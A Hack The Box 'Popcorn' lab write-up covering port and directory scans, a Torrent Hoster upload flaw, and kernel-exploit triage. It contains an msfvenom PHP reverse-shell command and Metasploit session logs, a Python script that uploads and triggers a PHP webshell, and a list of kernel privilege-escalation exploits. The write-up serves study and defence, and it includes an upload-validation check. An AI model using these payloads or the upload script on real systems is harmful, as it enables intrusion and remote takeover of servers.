HTB Popcorn [Hack The Box HTB Lab] Writeup Series 4

This is the fourth retired box, Popcorn.

Contents

0x00 Target overview

0x01 Port scan

0x02 Web directory and file scan

0x03 Getting a webshell

0x04 Privilege escalation


0x00 Target overview

[Image 1]

This is a Linux box. Overall the difficulty feels like a 3 to 4, a step up from the earlier boxes, but once you have worked through a few VulnHub machines the general approach to a Linux target is familiar.

0x01 Port scan

First, the port scan:

root@kali:~# nmap -T5 -A -v 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 07:19 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:19
Completed NSE at 07:19, 0.00s elapsed
Initiating NSE at 07:19
Completed NSE at 07:19, 0.00s elapsed
Initiating NSE at 07:19
Completed NSE at 07:19, 0.00s elapsed
Initiating Ping Scan at 07:19
Scanning 10.10.10.6 [4 ports]
Completed Ping Scan at 07:19, 0.57s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:19
Completed Parallel DNS resolution of 1 host. at 07:19, 0.14s elapsed
Initiating SYN Stealth Scan at 07:19
Scanning 10.10.10.6 [1000 ports]
Discovered open port 22/tcp on 10.10.10.6
Discovered open port 80/tcp on 10.10.10.6
Warning: 10.10.10.6 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 07:20, 4.20s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 2 services on 10.10.10.6
Completed Service scan at 07:20, 7.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.6
Retrying OS detection (try #2) against 10.10.10.6
Initiating Traceroute at 07:20
Completed Traceroute at 07:20, 0.66s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 07:20
Completed Parallel DNS resolution of 2 hosts. at 07:20, 0.25s elapsed
NSE: Script scanning 10.10.10.6.
Initiating NSE at 07:20
Completed NSE at 07:20, 15.17s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 2.17s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Nmap scan report for 10.10.10.6
Host is up (0.20s latency).
Not shown: 980 closed ports
PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp    open     http            Apache httpd 2.2.12 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
85/tcp    filtered mit-ml-dev
1067/tcp  filtered instl_boots
1213/tcp  filtered mpc-lifenet
1717/tcp  filtered fj-hdnet
2005/tcp  filtered deslogin
2047/tcp  filtered dls
2222/tcp  filtered EtherNetIP-1
3546/tcp  filtered unknown
5988/tcp  filtered wbem-http
6646/tcp  filtered unknown
8022/tcp  filtered oa-system
8654/tcp  filtered unknown
9010/tcp  filtered sdr
9290/tcp  filtered unknown
10617/tcp filtered unknown
32780/tcp filtered sometimes-rpc23
49160/tcp filtered unknown
55056/tcp filtered unknown
Aggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.32 (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), Linux 2.6.30 (95%), Linux 2.6.35 (95%), AVM FRITZ!Box FON WLAN 7240 WAP (94%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Android 2.3.5 (Linux 2.6) (94%), Epson WF-2660 printer (94%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.682 days (since Sat Feb  1 14:58:58 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=194 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   446.46 ms 10.10.14.1
2   653.63 ms 10.10.10.6

NSE: Script Post-scanning.
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Initiating NSE at 07:20
Completed NSE at 07:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.44 seconds
           Raw packets sent: 1573 (72.608KB) | Rcvd: 1166 (49.960KB)

Two ports are exposed, 22 and 80, so this is the standard route: get a webshell through the web application, then escalate privileges. One note on the scan itself: -T5 is aggressive enough that nmap hit its retransmission cap ("giving up on port because retransmission cap hit (2)"), so the eighteen ports reported as filtered are most likely dropped probes rather than a real firewall rule. Before concluding that 22 and 80 are all there is, a slower full-range pass (for example -T4 -p-) is worth the wait.

0x02 Web directory and file scan

Directory scan results:

root@kali:~# dirb http://10.10.10.6

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb  2 07:21:22 2020
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.6/ ----
*** Calculating NOT_FOUND code...
+ http://10.10.10.6/.bash_history (CODE:200|SIZE:414)
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)
+ http://10.10.10.6/index (CODE:200|SIZE:177)
+ http://10.10.10.6/index.html (CODE:200|SIZE:177)
+ http://10.10.10.6/server-status (CODE:403|SIZE:291)
+ http://10.10.10.6/test (CODE:200|SIZE:47330)
==> DIRECTORY: http://10.10.10.6/torrent/

---- Entering directory: http://10.10.10.6/torrent/ ----
==> DIRECTORY: http://10.10.10.6/torrent/admin/
+ http://10.10.10.6/torrent/browse (CODE:200|SIZE:9277)

The interesting hits:

  1. http://10.10.10.6/test
  2. http://10.10.10.6/torrent/

test is a phpinfo page. A quick look suggests the author does not intend for us to attack PHP itself, but it is still worth reading: the PHP version, the loaded modules and DOCUMENT_ROOT tell you where an uploaded file will land on disk. The .bash_history that came back with a 200 is also worth fetching; a shell history exposed under the web root is an information leak in its own right.

[Image 2]

0x03 Getting a webshell

Inside the torrent directory is a Torrent Hoster site:

[Image 3]

A search on exploit-db suggests the weakness is in the file upload: the application does not validate the file extension.

There is no ready-made exploit, though, so the details have to be worked out by hand.

After registering a user and logging in, walking through every feature turns up two upload points:

  1. torrent file upload
  2. screenshot file upload

Testing with Burp shows that during the screenshot upload the filename extension can simply be changed to .php. The steps:

1. Upload any torrent file (any one found online will do)

[Image 4]

2. Click Edit this torrent and choose an image file to upload

[Image 5]

3. Capture the request in Burp and change the filename extension to .php

[Image 6]

4. The uploaded file then shows up under the upload directory

[Image 7]

5. Generate a PHP reverse-connect payload with msfvenom. The output name a.png.php is deliberate: Apache picks the handler from the extensions in the name, and with .php last this file is executed as PHP regardless of the .png in the middle.

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > a.png.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30687 bytes

6. Replace the file content in the captured Burp request with the generated payload and send it

7. Open msf and start the listener (the payload has to be set on multi/handler explicitly, otherwise it defaults to windows/meterpreter/reverse_tcp, as the first show options below shows)

msf5 > search php/meterpreter_reverse_tcp

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/php/meterpreter_reverse_tcp                   normal  No     PHP Meterpreter, Reverse TCP Inline


msf5 > use payload/php/meterpreter_reverse_tcp
msf5 payload(php/meterpreter_reverse_tcp) > show options 

Module options (payload/php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf5 payload(php/meterpreter_reverse_tcp) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 payload(php/meterpreter_reverse_tcp) > back
msf5 > use multi/handler
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload ''
[-] The value specified for payload is not valid.
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.20:4444 
msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                      Payload opts
  --  ----                    -------                      ------------
  1   Exploit: multi/handler  php/meterpreter_reverse_tcp  tcp://10.10.14.20:4444

8. Open the uploaded file in the browser; the payload runs and the session comes back to the handler

msf5 exploit(multi/handler) > [*] Meterpreter session 8 opened (10.10.14.20:4444 -> 10.10.10.6:50803) at 2020-02-02 03:25:37 -0500

msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  8         meterpreter php/linux  www-data (33) @ popcorn  10.10.14.20:4444 -> 10.10.10.6:50803 (10.10.10.6)

msf5 exploit(multi/handler) > sessions 8
[*] Starting interaction with 8...

meterpreter >
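The script below replays steps 3, 4, 6 and 8 of that procedure without Burp, and puts beside it the server-side check that would have rejected the file. It is an added example written for this writeup, not code from the original post and not part of Torrent Hoster: the form-field names (id, file), the cookie string and both URLs are assumptions, to be replaced with whatever your own Burp capture of the "Edit this torrent" request shows.

```python
"""Replay of the screenshot-upload step without Burp, plus the check that
would have stopped it. Added example for this writeup; not code from the
original post and not part of Torrent Hoster.

ASSUMPTIONS (hypothetical; take the real values from your Burp capture of
the "Edit this torrent" request): form fields 'id' and 'file', the cookie
string, and the edit/upload URLs passed on the command line.
"""
import os
import re
import sys
import urllib.request

# Constructed stand-in for the msfvenom output; any PHP behaves the same way.
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>\n"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def build_multipart(fields, file_field, filename, content_type, data):
    """Hand-build a multipart/form-data body.

    A browser fills filename= from the picked file; building the body here
    lets us send filename="a.png.php" with Content-Type: image/png and PHP
    bytes inside, which is exactly the edit made in Burp (steps 3 and 6).
    Returns (boundary, body).
    """
    boundary = "----PopcornBoundary" + os.urandom(8).hex()
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
            f"\r\n\r\n{value}\r\n".encode()
        )
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
        f'filename="{filename}"\r\nContent-Type: {content_type}\r\n\r\n'.encode()
        + data + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return boundary, b"".join(parts)


def upload_screenshot(edit_url, cookie, torrent_id, filename, data):
    """POST the spoofed screenshot (network call; not exercised offline)."""
    boundary, body = build_multipart({"id": torrent_id}, "file", filename, "image/png", data)
    req = urllib.request.Request(edit_url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.status


def trigger(uploaded_url):
    """Step 8: GET the uploaded .php so mod_php runs it; the reverse shell
    then connects back to the multi/handler that is already listening."""
    with urllib.request.urlopen(uploaded_url, timeout=20) as resp:
        return resp.status


# Defender's side: what a screenshot upload should have checked.
ALLOWED = {"png": PNG_MAGIC, "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}


def accept_image(filename, data):
    """Strict check: exactly one allowlisted extension (so 'a.png.php' fails),
    magic bytes that match it, and a server-chosen stored name so the client
    never controls what Apache maps to a handler. Returns stored name or None."""
    m = re.fullmatch(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)", os.path.basename(filename))
    if m is None:
        return None
    ext = m.group(1).lower()
    if ext not in ALLOWED or not data.startswith(ALLOWED[ext]):
        return None
    return f"{os.urandom(8).hex()}.{ext}"


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: upload.py EDIT_URL COOKIE TORRENT_ID UPLOADED_URL")
    edit_url, cookie, torrent_id, uploaded_url = sys.argv[1:]
    print("upload:", upload_screenshot(edit_url, cookie, torrent_id, "a.png.php", PHP_PAYLOAD))
    print("trigger:", trigger(uploaded_url))
```

Start the multi/handler first, then run the script with the four values from your capture; the upload call returns the HTTP status and the trigger call fetches the file once so that the PHP connects back. The accept_image function is the defender's view of the same bug: it refuses the double extension, refuses PHP bytes in a .png, and never stores the client's filename.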

0x04 Privilege escalation

Check the kernel version:

uname -r
2.6.31-14-generic-pae

A search of exploit-db turns up plenty of candidates. The searchsploit query below matches every 2.6 kernel, so most rows have nothing to do with 2.6.31; the filters that matter are the version span in each title (entries such as 'Dirty COW' 2.6.22 < 3.9 and 'pipe.c' 2.6.10 < 2.6.31.5 cover this kernel, while 'Mempodipper' 2.6.39 < 3.2.2 cannot) and the path, since anything under linux/dos/ is a crash proof-of-concept rather than a privilege escalation (grep -v /dos/ removes those).
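As an added helper for exactly that filtering (written for this writeup; not part of the original post, of searchsploit or of exploit-db), the script below reads a searchsploit listing together with the uname -r string and keeps only the rows whose version spec covers the running kernel, dropping DoS proofs-of-concept. The sample rows embedded in it are copied from the listing that follows; the way it reads version spans (both bounds inclusive, "2.6.x" as a prefix match) is this script's own convention, chosen so that triage errs on the side of including a candidate.

```python
"""Filter searchsploit output down to entries whose version spec covers the
running kernel. Added helper for this writeup; not part of the original
post, of searchsploit or of exploit-db.

Usage (pipe the real listing in; with no stdin the sample rows are used):

    searchsploit "Linux Kernel 2.6." | python3 kernel_triage.py 2.6.31-14-generic-pae

Exploit-db titles are not consistent about whether the bounds of "A < B"
are inclusive, so both are treated as inclusive here: over-inclusion is the
right failure mode for triage.
"""
import re
import sys

VERSION = r"\d+(?:\.\d+)+"            # at least one dot, so "(1)" is not a version
RANGE_RE = re.compile(rf"({VERSION})\s*<\s*({VERSION})")
VERSION_RE = re.compile(VERSION)

# Constructed sample: seven rows copied from the searchsploit listing.
SAMPLE = """\
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | exploits/linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | exploits/linux/local/40812.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | exploits/linux/local/40616.c
Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow | exploits/linux/dos/33228.txt
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | exploits/linux/local/35161.c
Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1) | exploits/linux/local/25202.c
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation | exploits/linux/local/41770.txt
""".splitlines()


def parse_version(text):
    """'2.6.31-14-generic-pae' -> (2, 6, 31); stops at the first non-dotted part."""
    m = VERSION_RE.search(text)
    return tuple(int(x) for x in m.group(0).split(".")) if m else ()


def title_covers(title, kernel):
    """True if the title's version spec covers the kernel tuple."""
    ranges = RANGE_RE.findall(title)
    if ranges:
        return any(parse_version(lo) <= kernel <= parse_version(hi) for lo, hi in ranges)
    for tok in VERSION_RE.findall(title):      # bare '2.6.31', or '2.6' from '2.6.x'
        v = parse_version(tok)
        if kernel[: len(v)] == v:
            return True
    return False


def parse_line(line):
    """One searchsploit row -> (title, path); None for headers and rulers."""
    if "|" not in line:
        return None
    title, path = (p.strip() for p in line.rsplit("|", 1))
    if "/" not in path or not re.fullmatch(r"[\w./+-]+", path):
        return None
    return title, path


def triage(kernel_release, lines):
    """Rows covering the kernel, minus DoS PoCs, privilege escalations first."""
    kernel = parse_version(kernel_release)
    hits = []
    for line in lines:
        row = parse_line(line)
        if row is None:
            continue
        title, path = row
        if "/dos/" in path or not title_covers(title, kernel):
            continue
        hits.append((title, path))
    # stable sort: privesc entries first, listing order otherwise
    hits.sort(key=lambda tp: "Privilege Escalation" not in tp[0])
    return hits


if __name__ == "__main__":
    release = sys.argv[1] if len(sys.argv) > 1 else "2.6.31-14-generic-pae"
    rows = SAMPLE if sys.stdin.isatty() else sys.stdin
    for title, path in triage(release, rows):
        print(f"{path:36} {title}")
```

On the sample rows the script keeps the two 'pipe.c' entries, 'Dirty COW' and the 2.6.x 'SYS_EPoll_Wait' entry, and drops the 2.6.31 perf_counter row because it lives under linux/dos/. A hit only means the version span covers the kernel; whether the exploit works still depends on the architecture (this box is a 32-bit PAE kernel) and on the distribution's backported patches, so the surviving candidates still need to be read before being compiled on the target.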

searchsploit "Linux Kernel 2.6."
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        |  Path
                                                                                                                                                                      | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation                                                                                              | exploits/linux/local/160.c
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator                                                                                                               | exploits/linux/local/154.c
Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow (PoC)                                                                                | exploits/linux/dos/25647.sh
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)                                                                            | exploits/linux/local/9844.py
Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service                                                                                                       | exploits/linux/dos/686.c
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation                                                                                         | exploits/linux/local/145.c
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)                                                                                                | exploits/linux/local/141.c
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)                                                                                                | exploits/linux/local/142.c
Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read                                                                                                         | exploits/linux/local/624.c
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow                                                                                                           | exploits/linux/dos/692.c
Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service                                                                                                        | exploits/linux/dos/685.c
Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service                                                                                                       | exploits/linux/dos/691.c
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow                                                                                                              | exploits/linux/dos/690.c
Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation                                                                               | exploits/linux/local/25289.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit)                                                                 | exploits/linux/local/19933.rb
Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure                                                                                      | exploits/linux/local/27461.c
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation                          | exploits/linux/local/9545.c
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)                                                                             | exploits/linux/local/926.c
Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)                                                                                                  | exploits/linux/local/895.c
Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service                                                                                          | exploits/linux/dos/306.c
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)                                                                                                        | exploits/linux/dos/25287.c
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)                                                                                     | exploits/linux/local/25288.c
Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure                                                                                                | exploits/linux/dos/24777.txt
Linux Kernel 2.4.x/2.6.x - Multiple ISO9660 Filesystem Handling Vulnerabilities                                                                                       | exploits/linux/dos/25234.sh
Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read                                                                                          | exploits/linux/local/24043.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                                  | exploits/linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                                                                                                 | exploits/linux/local/33321.c
Linux Kernel 2.6.10 - File Lock Local Denial of Service                                                                                                               | exploits/linux/dos/25322.c
Linux Kernel 2.6.10 - Local Denial of Service                                                                                                                         | exploits/linux/dos/904.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation                                                                                                  | exploits/linux/local/40812.c
Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service                                                                                                     | exploits/linux/dos/998.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation                                                                                       | exploits/linux/local/2031.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)                                                                                         | exploits/linux/local/2004.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)                                                                                         | exploits/linux/local/2005.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)                                                                                         | exploits/linux/local/2006.c
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)                                                                                         | exploits/linux/local/2011.sh
Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation                                                                                                            | exploits/linux/local/29714.txt
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)                                                                                            | exploits/linux/local/5092.c
Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation                                                                                                             | exploits/linux/local/2013.c
Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service                                                                                             | exploits/linux/dos/28358.txt
Linux Kernel 2.6.18 - 'move_pages()' Information Leak                                                                                                                 | exploits/linux/local/40810.c
Linux Kernel 2.6.18 < 2.6.18-20 - Local Privilege Escalation                                                                                                          | exploits/linux/local/10613.c
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)                                                                                                         | exploits/linux/local/3587.c
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)                                                                                                         | exploits/linux/local/3595.c
Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow                          | exploits/linux/remote/8556.c
Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service                                                                                                       | exploits/linux/dos/4893.c
Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service                                                                                                 | exploits/linux/dos/30902.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)                                                    | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)                                                       | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                                                                          | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)                                                    | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                                                           | exploits/linux/local/40611.c
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)                                                                                              | exploits/linux/local/5093.c
Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation                   | exploits/linux_x86-64/local/9083.c
Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)                                                                                               | exploits/linux/dos/35957.txt
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation                                                                                    | exploits/linux_x86-64/local/15024.c
Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service                                                                                               | exploits/linux/dos/7454.c
Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service                                                                                                                | exploits/linux/dos/7405.c
Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation                                                                                                | exploits/linux/local/17391.c
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation                                                                                           | exploits/linux/local/8678.c
Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service                                                                                                             | exploits/linux/dos/274.c
Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)                                                                                                  | exploits/linux/local/9521.c
Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference                                                                                                       | exploits/linux/dos/33088.txt
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation                                                                                        | exploits/linux/local/9191.txt
Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow                                                                                                     | exploits/linux/dos/33228.txt
Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure                                                                                                         | exploits/linux/local/9352.c
Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure                                                                                                | exploits/linux/local/9513.c
Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service                                                                                               | exploits/linux/dos/10022.c
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation                                                                                       | exploits/linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)                                                                                                         | exploits/linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)                                                                                 | exploits/linux/local/25444.c
Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure                                                                                 | exploits/linux/local/24459.sh
Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow                                                                                                           | exploits/linux/dos/40819.c
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak                                                                                                                      | exploits/linux_x86-64/local/40811.c
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service                                                                                                            | exploits/linux/dos/14594.py
Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption                                                                                                | exploits/linux/dos/33886.txt
Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                                                                                                      | exploits/linux/dos/36425.txt
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite                                                                                                   | exploits/linux/local/15344.c
Linux Kernel 2.6.36 IGMP - Remote Denial of Service                                                                                                                   | exploits/linux/dos/18378.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                                                                                                   | exploits/linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation                                                                              | exploits/linux/local/15704.c
Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service                                                                                                           | exploits/linux/dos/15619.c
Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)                                                                                                              | exploits/linux/dos/16263.c
Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service                                                                                                            | exploits/linux/dos/15622.c
Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak                                                                                            | exploits/linux/local/18080.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)                                                                  | exploits/linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)                                                                                  | exploits/linux/local/35161.c
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation                                                           | exploits/linux/local/1397.c
